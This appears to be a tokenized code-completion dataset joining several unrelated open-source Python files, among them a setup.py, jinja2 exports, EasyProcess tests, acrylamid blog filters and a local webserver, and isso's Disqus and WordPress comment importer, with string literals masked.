encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> msg = [ <EOL> self . name , <EOL> u'<STR_LIT>' % self . uid , <EOL> u'<STR_LIT>' % self . steam_id , <EOL> ] <EOL> if self . team is not None : <EOL> msg . append ( u'<STR_LIT>' % self . team ) <EOL> return u'<STR_LIT>' . join ( msg ) </s>
<s> import os <EOL> from setuptools import setup <EOL> README = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) <EOL> os . chdir ( os . path . normpath ( os . path . join ( os . path . abspath ( __file__ ) , os . pardir ) ) ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals , absolute_import , division , print_function <EOL> HAND1 = """<STR_LIT>""" <EOL> HAND2 = """<STR_LIT>""" <EOL> HAND3 = """<STR_LIT>""" <EOL> HAND4 = """<STR_LIT>""" <EOL> HAND5 = """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> from jinja2 . environment import Environment , Template <EOL> from jinja2 . loaders import BaseLoader , FileSystemLoader , PackageLoader , DictLoader , FunctionLoader , PrefixLoader , ChoiceLoader , ModuleLoader <EOL> from jinja2 . bccache import BytecodeCache , FileSystemBytecodeCache , MemcachedBytecodeCache <EOL> from jinja2 . runtime import Undefined , DebugUndefined , StrictUndefined <EOL> from jinja2 . exceptions import TemplateError , UndefinedError , TemplateNotFound , TemplatesNotFound , TemplateSyntaxError , TemplateAssertionError <EOL> from jinja2 . filters import environmentfilter , contextfilter , evalcontextfilter <EOL> from jinja2 . utils import Markup , escape , clear_caches , environmentfunction , evalcontextfunction , contextfunction , is_undefined <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] </s>
<s> import logging <EOL> from polaris_health import Error <EOL> __all__ = [ '<STR_LIT>' ] <EOL> LOG = logging . getLogger ( __name__ ) <EOL> LOG . addHandler ( logging . NullHandler ( ) ) <EOL> MAX_NAME_LEN = <NUM_LIT> <EOL> MAX_POOL_NAME_LEN = <NUM_LIT> <EOL> MIN_TTL = <NUM_LIT:1> <EOL> class GlobalName : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , pool_name , ttl ) : <EOL> """<STR_LIT>""" <EOL> self . name = name . lower ( ) <EOL> if ( not isinstance ( name , str ) or len ( name ) == <NUM_LIT:0> <EOL> or len ( name ) > MAX_NAME_LEN ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name , MAX_NAME_LEN ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> self . pool_name = pool_name <EOL> if ( not isinstance ( pool_name , str ) or len ( pool_name ) == <NUM_LIT:0> <EOL> or len ( pool_name ) > MAX_POOL_NAME_LEN ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( pool_name , MAX_POOL_NAME_LEN ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> self . ttl = ttl <EOL> if ( not isinstance ( ttl , int ) or ttl < MIN_TTL ) : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( ttl , MIN_TTL ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> @ classmethod <EOL> def from_config_dict ( cls , name , obj ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in obj : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> if '<STR_LIT>' not in obj : <EOL> log_msg = ( '<STR_LIT>' <EOL> . format ( name ) ) <EOL> LOG . error ( log_msg ) <EOL> raise Error ( log_msg ) <EOL> return cls ( name = name , pool_name = obj [ '<STR_LIT>' ] , ttl = obj [ '<STR_LIT>' ] ) <EOL> def to_dist_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = { } <EOL> obj [ '<STR_LIT>' ] = self . pool_name <EOL> obj [ '<STR_LIT>' ] = self . ttl <EOL> return obj </s>
<s> from easyprocess import EasyProcess <EOL> from nose . tools import eq_ , timed , ok_ <EOL> from unittest import TestCase <EOL> import sys <EOL> python = sys . executable <EOL> class Test ( TestCase ) : <EOL> def test_timeout ( self ) : <EOL> p = EasyProcess ( '<STR_LIT>' ) . start ( ) <EOL> p . wait ( <NUM_LIT> ) <EOL> eq_ ( p . is_alive ( ) , True ) <EOL> p . wait ( <NUM_LIT> ) <EOL> eq_ ( p . is_alive ( ) , True ) <EOL> p . wait ( <NUM_LIT:2> ) <EOL> eq_ ( p . is_alive ( ) , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( ) . return_code == <NUM_LIT:0> , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:0.1> ) . return_code == <NUM_LIT:0> , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) . return_code == <NUM_LIT:0> , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( ) . timeout_happened , False ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:0.1> ) . timeout_happened , True ) <EOL> eq_ ( EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) . timeout_happened , False ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time_cli1 ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) <EOL> p . call ( ) <EOL> eq_ ( p . return_code , <NUM_LIT:0> ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time_cli2 ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) <EOL> p . call ( ) <EOL> eq_ ( p . return_code , <NUM_LIT:0> ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_time2 ( self ) : <EOL> p = EasyProcess ( '<STR_LIT>' ) . call ( timeout = <NUM_LIT:1> ) <EOL> eq_ ( p . is_alive ( ) , False ) <EOL> eq_ ( p . timeout_happened , True ) <EOL> ok_ ( p . return_code < <NUM_LIT:0> ) <EOL> eq_ ( p . stdout , '<STR_LIT>' ) <EOL> @ timed ( <NUM_LIT:3> ) <EOL> def test_timeout_out ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) . call ( timeout = <NUM_LIT:1> ) <EOL> eq_ ( p . 
is_alive ( ) , False ) <EOL> eq_ ( p . timeout_happened , True ) <EOL> ok_ ( p . return_code < <NUM_LIT:0> ) <EOL> eq_ ( p . stdout , '<STR_LIT>' ) <EOL> @ timed ( <NUM_LIT> ) <EOL> def test_time3 ( self ) : <EOL> EasyProcess ( '<STR_LIT>' ) . start ( ) </s>
<s> import io <EOL> import re <EOL> import json <EOL> import pickle <EOL> from os . path import join <EOL> from functools import partial <EOL> from acrylamid import core , utils , lib <EOL> from acrylamid . compat import PY2K , iteritems , text_type as str <EOL> from acrylamid . core import cache <EOL> from acrylamid . utils import Struct <EOL> from acrylamid . filters import Filter <EOL> from acrylamid . lib import requests <EOL> if PY2K : <EOL> from urllib import urlencode <EOL> from urlparse import urlparse , parse_qs <EOL> import cPickle as pickle <EOL> else : <EOL> from urllib . parse import urlencode <EOL> from urllib . parse import urlparse , parse_qs <EOL> __img_re = r'<STR_LIT>' <EOL> __img_re_title = r'<STR_LIT>' <EOL> def blockquote ( header , body ) : <EOL> """<STR_LIT>""" <EOL> def paragraphize ( text ) : <EOL> return '<STR_LIT>' + text . strip ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) + '<STR_LIT>' <EOL> by , source , title = None , None , None <EOL> m = re . match ( r'<STR_LIT>' , header , flags = re . I ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> source = m . group ( <NUM_LIT:2> ) + m . group ( <NUM_LIT:3> ) <EOL> title = m . group ( <NUM_LIT:4> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header , re . I ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> source = m . group ( <NUM_LIT:2> ) + m . group ( <NUM_LIT:3> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> title = m . group ( <NUM_LIT:2> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> quote = paragraphize ( body ) <EOL> author = '<STR_LIT>' % ( by . strip ( ) or '<STR_LIT>' ) <EOL> if source : <EOL> url = re . match ( r'<STR_LIT>' , source ) . group ( <NUM_LIT:1> ) <EOL> parts = [ ] <EOL> for part in url . split ( '<STR_LIT:/>' ) : <EOL> if not part or len ( '<STR_LIT:/>' . 
join ( parts + [ part ] ) ) >= <NUM_LIT:32> : <EOL> break <EOL> parts . append ( part ) <EOL> else : <EOL> parts . append ( '<STR_LIT>' ) <EOL> href = '<STR_LIT:/>' . join ( parts ) <EOL> if source : <EOL> cite = '<STR_LIT>' % ( source , ( title or href ) ) <EOL> elif title : <EOL> cite = '<STR_LIT>' % title <EOL> if not author : <EOL> blockquote = quote <EOL> elif cite : <EOL> blockquote = quote + "<STR_LIT>" % ( author + cite ) <EOL> else : <EOL> blockquote = quote + "<STR_LIT>" % author <EOL> return "<STR_LIT>" % blockquote <EOL> def img ( header , body = None ) : <EOL> """<STR_LIT>""" <EOL> attrs = re . match ( __img_re , header ) . groupdict ( ) <EOL> m = re . match ( __img_re_title , attrs [ '<STR_LIT:title>' ] ) <EOL> if m : <EOL> attrs [ '<STR_LIT:title>' ] = m . groupdict ( ) [ '<STR_LIT:title>' ] <EOL> attrs [ '<STR_LIT>' ] = m . groupdict ( ) [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:title>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs [ '<STR_LIT:title>' ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if '<STR_LIT:class>' in attrs : <EOL> attrs [ '<STR_LIT:class>' ] = attrs [ '<STR_LIT:class>' ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if attrs : <EOL> return '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , v ) for k , v in iteritems ( attrs ) if v ) + '<STR_LIT>' <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def youtube ( header , body = None ) : <EOL> if header . startswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> header = parse_qs ( urlparse ( header ) . query ) [ '<STR_LIT:v>' ] [ <NUM_LIT:0> ] <EOL> return '<STR_LIT>' + '<STR_LIT>' % header + '<STR_LIT>' <EOL> def pullquote ( header , body ) : <EOL> """<STR_LIT>""" <EOL> align = '<STR_LIT:left>' if '<STR_LIT:left>' in header . lower ( ) else '<STR_LIT:right>' <EOL> m = re . search ( r'<STR_LIT>' , body , re . MULTILINE | re . DOTALL ) <EOL> if m : <EOL> return '<STR_LIT>' . format ( <EOL> align , m . group ( <NUM_LIT:1> ) , re . 
sub ( r'<STR_LIT>' , '<STR_LIT>' , body ) ) <EOL> return "<STR_LIT>" <EOL> def tweet ( header , body = None ) : <EOL> """<STR_LIT>""" <EOL> oembed = '<STR_LIT>' <EOL> args = list ( map ( str . strip , re . split ( r'<STR_LIT>' , header ) ) ) <EOL> params = Struct ( url = args . pop ( <NUM_LIT:0> ) ) <EOL> for arg in args : <EOL> k , v = list ( map ( str . strip , arg . split ( '<STR_LIT:=>' ) ) ) <EOL> if k and v : <EOL> v = v . strip ( '<STR_LIT>' ) <EOL> params [ k ] = v <EOL> try : <EOL> with io . open ( join ( core . cache . cache_dir , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as fp : <EOL> cache = pickle . load ( fp ) <EOL> except ( IOError , pickle . PickleError ) : <EOL> cache = { } <EOL> if params in cache : <EOL> body = cache [ params ] <EOL> else : <EOL> try : <EOL> body = json . loads ( requests . get ( oembed + '<STR_LIT:?>' + urlencode ( params ) ) . read ( ) ) [ '<STR_LIT:html>' ] <EOL> except ( requests . HTTPError , requests . URLError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> body = "<STR_LIT>" <EOL> except ( ValueError , KeyError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> body = "<STR_LIT>" <EOL> else : <EOL> cache [ params ] = body <EOL> try : <EOL> with io . open ( join ( core . cache . cache_dir , '<STR_LIT>' ) , '<STR_LIT:wb>' ) as fp : <EOL> pickle . dump ( cache , fp , pickle . HIGHEST_PROTOCOL ) <EOL> except ( IOError , pickle . PickleError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" % body <EOL> class Liquid ( Filter ) : <EOL> match = [ re . compile ( '<STR_LIT>' , re . I ) ] <EOL> priority = <NUM_LIT> <EOL> directives = { <EOL> '<STR_LIT>' : blockquote , '<STR_LIT>' : pullquote , <EOL> '<STR_LIT>' : img , '<STR_LIT>' : tweet , <EOL> '<STR_LIT>' : youtube <EOL> } <EOL> def block ( self , tag ) : <EOL> return re . compile ( '<STR_LIT>' . join ( [ <EOL> r'<STR_LIT>' % tag , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> r'<STR_LIT>' % tag , <EOL> '<STR_LIT>' ] ) , re . MULTILINE | re . 
DOTALL ) <EOL> def transform ( self , text , entry , * args ) : <EOL> for tag , func in iteritems ( self . directives ) : <EOL> text = re . sub ( self . block ( tag ) , lambda m : func ( * m . groups ( ) ) , text ) <EOL> return text </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> from threading import Thread <EOL> from acrylamid . utils import force_unicode as u <EOL> from acrylamid . compat import PY2K <EOL> from acrylamid . helpers import joinurl <EOL> if PY2K : <EOL> from SocketServer import TCPServer <EOL> from SimpleHTTPServer import SimpleHTTPRequestHandler <EOL> else : <EOL> from socketserver import TCPServer <EOL> from http . server import SimpleHTTPRequestHandler <EOL> class ReuseAddressServer ( TCPServer ) : <EOL> """<STR_LIT>""" <EOL> allow_reuse_address = True <EOL> def serve_forever ( self ) : <EOL> """<STR_LIT>""" <EOL> while not self . kill_received : <EOL> if not self . wait : <EOL> self . handle_request ( ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> class RequestHandler ( SimpleHTTPRequestHandler ) : <EOL> """<STR_LIT>""" <EOL> www_root = '<STR_LIT:.>' <EOL> log_error = lambda x , * y : None <EOL> def translate_path ( self , path ) : <EOL> path = SimpleHTTPRequestHandler . translate_path ( self , path ) <EOL> return joinurl ( u ( os . getcwd ( ) ) , self . www_root , path [ len ( u ( os . getcwd ( ) ) ) : ] ) <EOL> def end_headers ( self ) : <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> SimpleHTTPRequestHandler . end_headers ( self ) <EOL> class Webserver ( Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , port = <NUM_LIT> , root = '<STR_LIT:.>' , log_message = lambda x , * y : None ) : <EOL> Thread . __init__ ( self ) <EOL> Handler = RequestHandler <EOL> Handler . www_root = root <EOL> Handler . log_message = log_message <EOL> self . httpd = ReuseAddressServer ( ( "<STR_LIT>" , port ) , Handler ) <EOL> self . httpd . wait = False <EOL> self . httpd . kill_received = False <EOL> def setwait ( self , value ) : <EOL> self . httpd . wait = value <EOL> wait = property ( lambda self : self . httpd . wait , setwait ) <EOL> def run ( self ) : <EOL> self . httpd . serve_forever ( ) <EOL> self . 
join ( <NUM_LIT:1> ) <EOL> def shutdown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . httpd . kill_received = True <EOL> self . httpd . socket . close ( ) </s>
<s> from __future__ import unicode_literals <EOL> import sys <EOL> import os <EOL> import io <EOL> import json <EOL> def find ( node ) : <EOL> if len ( node ) == <NUM_LIT:2> : <EOL> yield node [ <NUM_LIT:1> ] <EOL> for key in node [ <NUM_LIT:0> ] : <EOL> find ( node [ <NUM_LIT:0> ] [ key ] ) <EOL> def search ( needle , haystack ) : <EOL> if needle [ <NUM_LIT:0> ] not in haystack : <EOL> return False <EOL> node = haystack [ needle [ <NUM_LIT:0> ] ] <EOL> needle = needle [ <NUM_LIT:1> : ] <EOL> i , j = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while j < len ( needle ) : <EOL> if needle [ i : j + <NUM_LIT:1> ] in node [ <NUM_LIT:0> ] : <EOL> node = node [ <NUM_LIT:0> ] [ needle [ i : j + <NUM_LIT:1> ] ] <EOL> i = j + <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> if i != j : <EOL> return False <EOL> if len ( node ) == <NUM_LIT:2> : <EOL> print '<STR_LIT>' , node [ <NUM_LIT:1> ] <EOL> rest = [ ] <EOL> for key in node [ <NUM_LIT:0> ] : <EOL> rest . append ( list ( find ( node [ <NUM_LIT:0> ] [ key ] ) ) ) <EOL> print '<STR_LIT>' , sum ( sum ( rest , [ ] ) , [ ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> print '<STR_LIT>' % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> with io . open ( sys . argv [ <NUM_LIT:1> ] ) as fp : <EOL> tree = { os . path . basename ( sys . argv [ <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] : json . load ( fp ) } <EOL> search ( sys . argv [ <NUM_LIT:2> ] . decode ( '<STR_LIT:utf-8>' ) , tree ) </s>
<s> from __future__ import division , print_function , unicode_literals <EOL> import sys <EOL> import os <EOL> import io <EOL> import re <EOL> import logging <EOL> import textwrap <EOL> import functools <EOL> from time import mktime , strptime , time <EOL> from collections import defaultdict <EOL> from isso . utils import anonymize <EOL> from isso . compat import string_types <EOL> try : <EOL> input = raw_input <EOL> except NameError : <EOL> pass <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> from xml . etree import ElementTree <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> def strip ( val ) : <EOL> if isinstance ( val , string_types ) : <EOL> return val . strip ( ) <EOL> return val <EOL> class Progress ( object ) : <EOL> def __init__ ( self , end ) : <EOL> self . end = end or <NUM_LIT:1> <EOL> self . istty = sys . stdout . isatty ( ) <EOL> self . last = <NUM_LIT:0> <EOL> def update ( self , i , message ) : <EOL> if not self . istty or message is None : <EOL> return <EOL> cols = int ( ( os . popen ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) ) . split ( ) [ <NUM_LIT:1> ] ) <EOL> message = message [ : cols - <NUM_LIT:7> ] <EOL> if time ( ) - self . last > <NUM_LIT> : <EOL> sys . stdout . write ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" * cols ) ) <EOL> sys . stdout . write ( "<STR_LIT>" . format ( i / self . end , message ) ) <EOL> sys . stdout . flush ( ) <EOL> self . last = time ( ) <EOL> def finish ( self , message ) : <EOL> self . last = <NUM_LIT:0> <EOL> self . update ( self . end , message + "<STR_LIT:\n>" ) <EOL> class Disqus ( object ) : <EOL> ns = '<STR_LIT>' <EOL> internals = '<STR_LIT>' <EOL> def __init__ ( self , db , xmlfile , empty_id = False ) : <EOL> self . threads = set ( [ ] ) <EOL> self . comments = set ( [ ] ) <EOL> self . db = db <EOL> self . xmlfile = xmlfile <EOL> self . 
empty_id = empty_id <EOL> def insert ( self , thread , posts ) : <EOL> path = urlparse ( thread . find ( '<STR_LIT>' % Disqus . ns ) . text ) . path <EOL> remap = dict ( ) <EOL> if path not in self . db . threads : <EOL> self . db . threads . new ( path , thread . find ( Disqus . ns + '<STR_LIT:title>' ) . text . strip ( ) ) <EOL> for item in sorted ( posts , key = lambda k : k [ '<STR_LIT>' ] ) : <EOL> dsq_id = item . pop ( '<STR_LIT>' ) <EOL> item [ '<STR_LIT>' ] = remap . get ( item . pop ( '<STR_LIT>' , None ) ) <EOL> rv = self . db . comments . add ( path , item ) <EOL> remap [ dsq_id ] = rv [ "<STR_LIT:id>" ] <EOL> self . comments . update ( set ( remap . keys ( ) ) ) <EOL> def migrate ( self ) : <EOL> tree = ElementTree . parse ( self . xmlfile ) <EOL> res = defaultdict ( list ) <EOL> for post in tree . findall ( Disqus . ns + '<STR_LIT>' ) : <EOL> item = { <EOL> '<STR_LIT>' : post . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) , <EOL> '<STR_LIT:text>' : post . find ( Disqus . ns + '<STR_LIT:message>' ) . text , <EOL> '<STR_LIT>' : post . find ( '<STR_LIT>' . format ( Disqus . ns ) ) . text , <EOL> '<STR_LIT:email>' : post . find ( '<STR_LIT>' . format ( Disqus . ns ) ) . text , <EOL> '<STR_LIT>' : mktime ( strptime ( <EOL> post . find ( Disqus . ns + '<STR_LIT>' ) . text , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : anonymize ( post . find ( Disqus . ns + '<STR_LIT>' ) . text ) , <EOL> '<STR_LIT>' : <NUM_LIT:1> if post . find ( Disqus . ns + "<STR_LIT>" ) . text == "<STR_LIT:false>" else <NUM_LIT:4> <EOL> } <EOL> if post . find ( Disqus . ns + '<STR_LIT>' ) is not None : <EOL> item [ '<STR_LIT>' ] = post . find ( Disqus . ns + '<STR_LIT>' ) . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) <EOL> res [ post . find ( '<STR_LIT>' % Disqus . ns ) . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) ] . append ( item ) <EOL> progress = Progress ( len ( tree . findall ( Disqus . ns + '<STR_LIT>' ) ) ) <EOL> for i , thread in enumerate ( tree . 
findall ( Disqus . ns + '<STR_LIT>' ) ) : <EOL> progress . update ( i , thread . find ( Disqus . ns + '<STR_LIT:id>' ) . text ) <EOL> if thread . find ( Disqus . ns + '<STR_LIT:id>' ) . text is None and not self . empty_id : <EOL> continue <EOL> id = thread . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) <EOL> if id in res : <EOL> self . threads . add ( id ) <EOL> self . insert ( thread , res [ id ] ) <EOL> self . db . comments . _remove_stale ( ) <EOL> progress . finish ( "<STR_LIT>" . format ( <EOL> len ( self . threads ) , len ( self . comments ) ) ) <EOL> orphans = set ( map ( lambda e : e . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) , tree . findall ( Disqus . ns + "<STR_LIT>" ) ) ) - self . comments <EOL> if orphans and not self . threads : <EOL> print ( "<STR_LIT>" ) <EOL> elif orphans : <EOL> print ( "<STR_LIT>" % len ( orphans ) ) <EOL> for post in tree . findall ( Disqus . ns + "<STR_LIT>" ) : <EOL> if post . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) not in orphans : <EOL> continue <EOL> print ( "<STR_LIT>" . format ( <EOL> post . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) , <EOL> post . find ( "<STR_LIT>" . format ( Disqus . ns ) ) . text , <EOL> post . find ( "<STR_LIT>" . format ( Disqus . ns ) ) . text ) ) <EOL> print ( textwrap . fill ( post . find ( Disqus . ns + "<STR_LIT:message>" ) . text , <EOL> initial_indent = "<STR_LIT:U+0020>" , subsequent_indent = "<STR_LIT:U+0020>" ) ) <EOL> print ( "<STR_LIT>" ) <EOL> class WordPress ( object ) : <EOL> ns = "<STR_LIT>" <EOL> def __init__ ( self , db , xmlfile ) : <EOL> self . db = db <EOL> self . xmlfile = xmlfile <EOL> self . count = <NUM_LIT:0> <EOL> for line in io . open ( xmlfile , encoding = "<STR_LIT:utf-8>" ) : <EOL> m = WordPress . detect ( line ) <EOL> if m : <EOL> self . ns = WordPress . ns . replace ( "<STR_LIT:1.0>" , m . group ( <NUM_LIT:1> ) ) <EOL> break <EOL> else : <EOL> logger . 
warn ( "<STR_LIT>" ) <EOL> def insert ( self , thread ) : <EOL> url = urlparse ( thread . find ( "<STR_LIT>" ) . text ) <EOL> path = url . path <EOL> if url . query : <EOL> path += "<STR_LIT:?>" + url . query <EOL> self . db . threads . new ( path , thread . find ( "<STR_LIT:title>" ) . text . strip ( ) ) <EOL> comments = list ( map ( self . Comment , thread . findall ( self . ns + "<STR_LIT>" ) ) ) <EOL> comments . sort ( key = lambda k : k [ "<STR_LIT:id>" ] ) <EOL> remap = { } <EOL> ids = set ( c [ "<STR_LIT:id>" ] for c in comments ) <EOL> self . count += len ( ids ) <EOL> while comments : <EOL> for i , item in enumerate ( comments ) : <EOL> if item [ "<STR_LIT>" ] in ids : <EOL> continue <EOL> item [ "<STR_LIT>" ] = remap . get ( item [ "<STR_LIT>" ] , None ) <EOL> rv = self . db . comments . add ( path , item ) <EOL> remap [ item [ "<STR_LIT:id>" ] ] = rv [ "<STR_LIT:id>" ] <EOL> ids . remove ( item [ "<STR_LIT:id>" ] ) <EOL> comments . pop ( i ) <EOL> break <EOL> else : <EOL> return <EOL> def migrate ( self ) : <EOL> tree = ElementTree . parse ( self . xmlfile ) <EOL> skip = <NUM_LIT:0> <EOL> items = tree . findall ( "<STR_LIT>" ) <EOL> progress = Progress ( len ( items ) ) <EOL> for i , thread in enumerate ( items ) : <EOL> if thread . find ( "<STR_LIT:title>" ) . text is None or thread . find ( self . ns + "<STR_LIT>" ) is None : <EOL> skip += <NUM_LIT:1> <EOL> continue <EOL> progress . update ( i , thread . find ( "<STR_LIT:title>" ) . text ) <EOL> self . insert ( thread ) <EOL> progress . finish ( "<STR_LIT>" . format ( <EOL> len ( items ) - skip , self . count ) ) <EOL> def Comment ( self , el ) : <EOL> return { <EOL> "<STR_LIT:text>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT:email>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . 
text ) , <EOL> "<STR_LIT>" : anonymize ( <EOL> strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) ) , <EOL> "<STR_LIT>" : mktime ( strptime ( <EOL> strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" : <NUM_LIT:1> if el . find ( self . ns + "<STR_LIT>" ) . text == "<STR_LIT:1>" else <NUM_LIT:2> , <EOL> "<STR_LIT:id>" : int ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : int ( el . find ( self . ns + "<STR_LIT>" ) . text ) or None <EOL> } <EOL> @ classmethod <EOL> def detect ( cls , peek ) : <EOL> return re . compile ( "<STR_LIT>" ) . search ( peek ) <EOL> def autodetect ( peek ) : <EOL> if '<STR_LIT>' in peek : <EOL> return Disqus <EOL> m = WordPress . detect ( peek ) <EOL> if m : <EOL> return WordPress <EOL> return None <EOL> def dispatch ( type , db , dump , empty_id = False ) : <EOL> if db . execute ( "<STR_LIT>" ) . fetchone ( ) : <EOL> if input ( "<STR_LIT>" ) not in ( "<STR_LIT:y>" , "<STR_LIT:Y>" ) : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> if type == "<STR_LIT>" : <EOL> cls = Disqus <EOL> elif type == "<STR_LIT>" : <EOL> cls = WordPress <EOL> else : <EOL> with io . open ( dump , encoding = "<STR_LIT:utf-8>" ) as fp : <EOL> cls = autodetect ( fp . read ( io . DEFAULT_BUFFER_SIZE ) ) <EOL> if cls is None : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> if cls is Disqus : <EOL> cls = functools . partial ( cls , empty_id = empty_id ) <EOL> cls ( db , dump ) . migrate ( ) </s>
